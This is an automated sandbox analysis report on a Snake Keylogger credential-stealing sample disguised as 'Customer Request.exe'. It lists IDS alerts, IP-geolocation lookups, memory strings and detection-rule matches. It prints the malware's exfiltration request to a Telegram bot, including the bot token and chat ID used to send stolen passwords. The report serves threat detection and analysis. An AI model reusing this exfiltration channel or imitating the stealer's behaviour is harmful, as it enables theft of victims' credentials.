Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49727 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49718 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49737 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49734 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 104.21.112.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49713 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49722 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5190d8bacacdHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: Customer Request.exe, gCFuOglEso.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Customer Request.exe, gCFuOglEso.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Customer Request.exe, gCFuOglEso.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: Customer Request.exe, 00000000.00000002.1487696864.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1520510912.0000000002521000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Customer Request.exe, gCFuOglEso.exe.0.dr | String found in binary or memory: http://tempuri.org/DataTableUsers.xsd
Source: Customer Request.exe, 0000000A.00000002.2710969497.0000000003198000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003125000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF4000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BF9000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002D05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org0
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Customer Request.exe, 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, Customer Request.exe, 0000000A.00000002.2710969497.0000000003081000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002A52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002BC3000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, gCFuOglEso.exe, 0000000F.00000002.2710539876.0000000002B82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Customer Request.exe, gCFuOglEso.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50014 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50024 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50087 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50088 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50089 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50090 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50092 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50093 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50094 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50095 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:50096 version: TLS 1.2
Source: C:\Users\user\Desktop\Customer Request.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: sslproxydump.pcap, type: PCAP | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 10.2.Customer Request.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.Customer Request.exe.457d230.1.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.Customer Request.exe.459de50.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.Customer Request.exe.459de50.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e6a8e8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.Customer Request.exe.457d230.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 11.2.gCFuOglEso.exe.3e49cc8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0000000F.00000002.2710539876.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0000000F.00000002.2710539876.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0000000F.00000002.2704268195.0000000000418000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 00000000.00000002.1490920950.000000000457D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0000000A.00000002.2710969497.0000000003152000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0000000B.00000002.1521631813.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: Process Memory Space: Customer Request.exe PID: 5944, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: Customer Request.exe PID: 5932, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: Process Memory Space: gCFuOglEso.exe PID: 4500, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: gCFuOglEso.exe PID: 7388, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Customer Request.exe, Form4.cs | Long String: Length: 169248
Source: gCFuOglEso.exe.0.dr, Form4.cs | Long String: Length: 169248
Source: C:\Users\user\Desktop\Customer Request.exe | Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_06C92AB010_2_06C92AB0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07242E7410_2_07242E74
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_072455D810_2_072455D8
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07243BC010_2_07243BC0
                  Source: C:\Users\user\Desktop\Customer Request.exeCode function: 10_2_07243BD010_2_07243BD0
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeCode function: 11_2_00B7E04411_2_00B7E044
